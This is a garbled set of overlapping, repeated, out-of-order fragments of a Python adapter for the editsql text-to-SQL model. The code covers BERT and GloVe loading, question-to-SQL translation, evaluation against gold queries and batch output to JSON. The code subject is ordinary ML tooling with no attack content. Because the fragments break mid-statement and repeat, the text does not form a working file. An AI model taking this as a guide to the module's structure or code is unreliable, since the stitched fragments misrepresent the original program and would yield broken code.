question db_id: the database that acts as context prev_nl_questions: the", "question db_id: the database that acts as context prev_nl_questions: the previous questions or", "language question and the database id \"\"\" # establish the structure of an", "list of dicts with values for nl_question and db_id from the input file", "1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str", "else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return model", "db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation", "from the file amount = len(references) # determine the instances to test on", "database id \"\"\" # establish the structure of an interaction in raw state", "data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \"", "path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w')", "from pathlib import Path import numpy as np import json import torch from", "import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval", "Returns: an InteractionItem that contains the natural language question and the database id", "prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language question and the", "self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw =", "db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id]", "Predict the sql for the next utterance in an interaction Args: nl_question: the", "\"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'}", "bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file',", "= references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw", "comparison with the gold queries from spider Args: amount: the amount of samples", "== 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining = False bert_config_file", "random import time from pathlib import Path import numpy as np import json", "establish the structure of an interaction in raw state example = dict() example[\"final\"]", "= BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device =", "references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction =", "setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32)", "\"\"\" Uses the functionality of editsql to translate arbitrary questions into sql \"\"\"", "the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary,", "* 100 / amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"#", "0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size]", "glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab))", "'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None", "f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer(", "def translate(self, nl_question, db_id): \"\"\" Translate a single natural language question into sql", "file in the output directory Args: input_file: path of file with list of", "and prevent numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else", "# --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens", "= ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={},", "num_errors accuracy = num_correct * 100 / amount eval_output = dict() eval_output[\"time per", "a modified embeddings loading function that makes use of the preloaded glove def", "data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file", "the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile)", "+= 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings", "data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={},", "directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename),", "= read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction in", "the functionality of editsql to translate arbitrary questions into sql \"\"\" def __init__(self,", "\"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read", "= json.load(infile) if not amount: # let amount default to _all_ examples from", "[nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def", "prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction,", "vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov,", "def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove", "postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False,", "gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm", "in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in translation)", "database id Args: nl_questions: the natural language questions db_id: the database that acts", "import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider,", "list Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question]", "spider instead of the prediction results of standalone editsql \"\"\" # load the", "InteractionItem that contains the natural language question and the database id Args: nl_questions:", "= 42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\")", "= postprocess_one(gold, schema) # normalize and prevent numbering from distorting the results gold_norm", "Args: input_file: path of file with list of dicts with values for nl_question", "output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings", "an interaction in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] =", "time_per_item = duration / amount num_correct = amount - num_errors accuracy = num_correct", "True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint", "c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else", "= references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction", "/ \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\"", "vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert", "vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load", "comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing", "database that acts as context prev_predictions: the previous predictions Returns: an InteractionItem that", "\"\"\" # load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile:", "1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings =", "modified version with absolute path instead of relative path in the first line", "= self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function", "----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with", "from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to", "self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol", "to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def", "editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from", "the previous predictions Returns: an InteractionItem that contains the natural language question and", "results of standalone editsql act as the reference. The use_gold_query switch enables comparison", "print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file,", "use randomness: randomly choose samples show_all: write all samples, not only those with", "= translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors", "do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH,", "'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary)", "\"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform", "= ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\"", "else c.lower() for c in translation) if use_gold_query: is_error = translation_norm != gold_norm", "example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw", "dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in", "question into sql Args: nl_question: the natural language question db_id: the database that", "is_error: num_errors += 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] =", "# ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size =", "single natural language question into sql Args: nl_question: the natural language question db_id:", "id \"\"\" # establish the structure of an interaction in raw state example", "spider Args: amount: the amount of samples to use randomness: randomly choose samples", "vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings", "import time from pathlib import Path import numpy as np import json import", "editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from", "= {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type =", "the next utterance in an interaction Args: nl_question: the natural language question db_id:", "else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return", "structure of an interaction in raw state example = dict() example[\"final\"] = dict()", "translate(self, nl_question, db_id): \"\"\" Translate a single natural language question into sql Args:", "with errors use_gold_query: comparison with the gold queries from spider instead of the", "from the input file and save the translations to a file in the", "in the output directory Args: input_file: path of file with list of dicts", "data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary,", "model Args: params: the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel", "import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from", "the database that acts as context prev_nl_questions: the previous questions or an empty", "= time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"]", "gold queries from spider instead of the prediction results of standalone editsql \"\"\"", "fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] =", "schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction in raw state", "of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 #", "None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite", "column_names={}, database_schemas_dict={}) # function used for loading of interaction in raw state self.int_load_function", "None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return model def", "language questions db_id: the database that acts as context prev_predictions: the previous predictions", "= time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq", "= ''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error", "input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for nl_question and", "in an interaction Args: nl_question: the natural language question db_id: the database that", "def load_model(self, params, data): \"\"\" Loads the editsql translation model Args: params: the", "db_id): \"\"\" Translate a single natural language question into sql Args: nl_question: the", "= os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file)", "example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw interaction to an", "gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time()", "para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in", "pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens) return", "comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else:", "the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model =", "randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By default the", "editsql translation model Args: params: the parsed arguments data: the ATISDataset Returns: the", "raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill", "Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of", "'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb", "as context prev_nl_questions: the previous questions or an empty list prev_predictions: the previous", "determine the instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else:", "if c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit()", "def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed", "of samples to use randomness: randomly choose samples show_all: write all samples, not", "Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions,", "By default the prediction results of standalone editsql act as the reference. The", "show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] =", "empty list prev_predictions: the previous predictions or an empty list Returns: the sql", "the prediction results of standalone editsql act as the reference. The use_gold_query switch", "not only those with errors use_gold_query: comparison with the gold queries from spider", "for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c", "for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c", "requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests,", "data): \"\"\" Loads the editsql translation model Args: params: the parsed arguments data:", "act as the reference. The use_gold_query switch enables comparison with the gold queries", "dataset and model data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas", "from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel", "input_file: path of file with list of dicts with values for nl_question and", "use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By default the prediction results", "the natural language question and the database id \"\"\" # establish the structure", "comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison)", "start time_per_item = duration / amount num_correct = amount - num_errors accuracy =", "model from file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id,", "obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id):", "prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000)", "open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a modified", "editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model", "torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function", "of relative path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR /", "\"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function with the", "read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from", "= pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str", "- num_errors accuracy = num_correct * 100 / amount eval_output = dict() eval_output[\"time", "items\"] = amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else:", "request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") +", "the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in", "natural language question and the database id \"\"\" # establish the structure of", "params): glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings", "= load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql", "sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the", "= None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size #", "BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass", "file and save the translations to a file in the output directory Args:", "BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\"", "import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of", "functionality of editsql to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"):", "loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize", "translation output of EditsqlAdapter. By default the prediction results of standalone editsql act", "interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single", "print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert,", "is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold", "that contains the natural language question and the database id \"\"\" # establish", "0 para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token", "np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for", "post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0,", "if not amount: # let amount default to _all_ examples from the file", "params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case =", "Loads the editsql translation model Args: params: the parsed arguments data: the ATISDataset", "prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance in an interaction", "schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation -----------------", "_, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of", "\"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions)", "self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and", "the translations to a file in the output directory Args: input_file: path of", "numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for", "accuracy = num_correct * 100 / amount eval_output = dict() eval_output[\"time per item\"]", "version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute path instead", "'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if", "nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction,", "from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert", "input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens", "prev_predictions: the previous predictions Returns: an InteractionItem that contains the natural language question", "from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as", "nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw interaction to", "path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb", "'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining", "Args: amount: the amount of samples to use randomness: randomly choose samples show_all:", "interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction", "!= gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1", "comparisons = [] num_errors = 0 start = time.time() for i in sample_indices:", "= 0 start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw", "query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\":", "db_id from the input file and save the translations to a file in", "write all samples, not only those with errors use_gold_query: comparison with the gold", "c.lower() for c in translation) if use_gold_query: is_error = translation_norm != gold_norm else:", "os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer =", "import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import", "default to _all_ examples from the file amount = len(references) # determine the", "embeddings loading function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary,", "or an empty list Returns: the sql prediction \"\"\" # preprocess nl_questions =", "import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import", "= self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def", "''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if", "function used for loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary,", "equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output,", "to be predicted\" # transform the raw interaction to an InteractionItem obj, _", "let amount default to _all_ examples from the file amount = len(references) #", "self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id,", "only those with errors use_gold_query: comparison with the gold queries from spider instead", "\"\"\" Translate a single natural language question into sql Args: nl_question: the natural", "editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import *", "!= dev_pred_norm if is_error: num_errors += 1 if is_error or show_all: comparison =", "= False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH,", "return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains", "translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm !=", "Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile:", "and save the translations to a file in the output directory Args: input_file:", "next utterance in an interaction Args: nl_question: the natural language question db_id: the", "load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references =", "dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold", "if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" +", "postprocess_one(gold, schema) # normalize and prevent numbering from distorting the results gold_norm =", "# establish the structure of an interaction in raw state example = dict()", "in translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm", "nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language question", "def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next", "glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov =", "= comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def", "in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else:", "if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the", "references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query:", "Evaluate the translation output of EditsqlAdapter. By default the prediction results of standalone", "gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1 if", "to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount)", "open(input_file) as f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] =", "with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with", "= translation comparisons.append(comparison) end = time.time() duration = end - start time_per_item =", "\".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction,", "input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with the", "comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls,", "= ''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\"", "comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold", "glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = 